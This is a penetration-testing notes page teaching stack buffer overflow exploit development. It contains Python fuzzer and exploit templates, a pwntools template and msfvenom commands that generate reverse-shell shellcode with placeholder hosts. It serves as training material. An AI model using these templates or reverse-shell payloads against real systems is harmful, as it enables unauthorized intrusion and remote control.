Pentest_Notes

💣 Exploit Development & Buffer Overflows

Organized notes for exploit development and buffer overflow techniques. Last Updated: 2026-03-27

Overview

Exploit development involves crafting custom exploits to take advantage of vulnerabilities in software, primarily memory corruption bugs like buffer overflows. Understanding this helps modify public exploits and develop custom solutions when needed.

Buffer Overflow — Methodology

Checklist

Identify the vulnerable application and input vector
Fuzz the input to find the crash point
Determine the exact offset to EIP/RIP
Verify EIP/RIP control
Identify bad characters
Find a suitable return address (JMP ESP, etc.)
Generate shellcode
Craft final exploit
Test and debug

Stack-Based Buffer Overflow (x86)

Step 1: Fuzzing

#!/usr/bin/env python3
import socket

target_ip = "TARGET_IP"
target_port = TARGET_PORT
buffer = b"A" * 100

while True:
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(5)
        s.connect((target_ip, target_port))
        s.send(buffer + b"\r\n")
        s.recv(1024)
        s.close()
        buffer += b"A" * 100
        print(f"[+] Sent {len(buffer)} bytes")
    except:
        print(f"[!] Crashed at {len(buffer)} bytes")
        break

Step 2: Find Exact Offset

# Generate pattern
msf-pattern_create -l <CRASH_LENGTH>

# After crash, find offset
msf-pattern_offset -l <CRASH_LENGTH> -q <EIP_VALUE>

Step 3: Verify EIP Control

offset = <OFFSET_VALUE>
eip = b"B" * 4
buffer = b"A" * offset + eip + b"C" * (total_length - offset - 4)
# Send and verify EIP = 42424242

Step 4: Find Bad Characters

# Generate all possible bytes (exclude 0x00 by default)
badchars = (
    b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f"
    b"\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
    b"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f"
    b"\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f"
    b"\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f"
    b"\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
    b"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f"
    b"\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
    b"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f"
    b"\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
    b"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf"
    b"\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
    b"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf"
    b"\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
    b"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef"
    b"\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)
# Send and compare in debugger — remove any that corrupt the sequence

Step 5: Find JMP ESP

# In Immunity Debugger with mona
!mona jmp -r esp -cpb "\x00"

# Or use msf-nasm_shell
msf-nasm_shell
nasm> JMP ESP
# Returns: FFE4

Step 6: Generate Shellcode

# Reverse shell shellcode
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -b '\x00' -f python -v shellcode EXITFUNC=thread

# Linux reverse shell
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -b '\x00' -f python -v shellcode

Step 7: Final Exploit

#!/usr/bin/env python3
import socket, struct

target_ip = "TARGET_IP"
target_port = TARGET_PORT
offset = OFFSET_VALUE
jmp_esp = struct.pack("<I", 0xADDRESS)  # JMP ESP address (little-endian)
nop_sled = b"\x90" * 16

shellcode = b""  # Paste msfvenom output here

buffer = b"A" * offset + jmp_esp + nop_sled + shellcode

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target_ip, target_port))
s.send(buffer + b"\r\n")
s.close()
print("[+] Exploit sent!")

Modern Protections & Bypasses

Protection	Description	Bypass Technique
DEP/NX	Non-executable stack	ROP chains
ASLR	Randomized memory layout	Information leak, partial overwrite
Stack Canaries	Cookie before return address	Info leak, brute force
SafeSEH	Protected exception handlers	Non-SafeSEH modules
CFG	Control Flow Guard	Indirect call target manipulation

Tools

Tool	Purpose
GDB + GEF/PEDA	Linux debugging
Immunity Debugger + mona.py	Windows debugging
x64dbg	Modern Windows debugger
ROPgadget	ROP chain generation
pwntools	Python exploit development library
msfvenom	Shellcode generation
radare2 / Ghidra	Reverse engineering

GDB with GEF

# Start GDB with GEF
gdb ./binary
gef> run
gef> pattern create 500
gef> pattern offset 0x41414141
gef> checksec

Pwntools Template

#!/usr/bin/env python3
from pwn import *

context.binary = './binary'
context.log_level = 'debug'

p = process('./binary')
# p = remote('target', port)

payload = b"A" * offset
payload += p32(return_address)
payload += b"\x90" * 16
payload += shellcode

p.sendline(payload)
p.interactive()

Common Pitfalls / Gotchas

Forgetting little-endian byte order for addresses
Not accounting for all bad characters
NOP sled too small — use at least 16 bytes
Not testing shellcode independently before using in exploit
Forgetting EXITFUNC=thread (causes service crash if not set)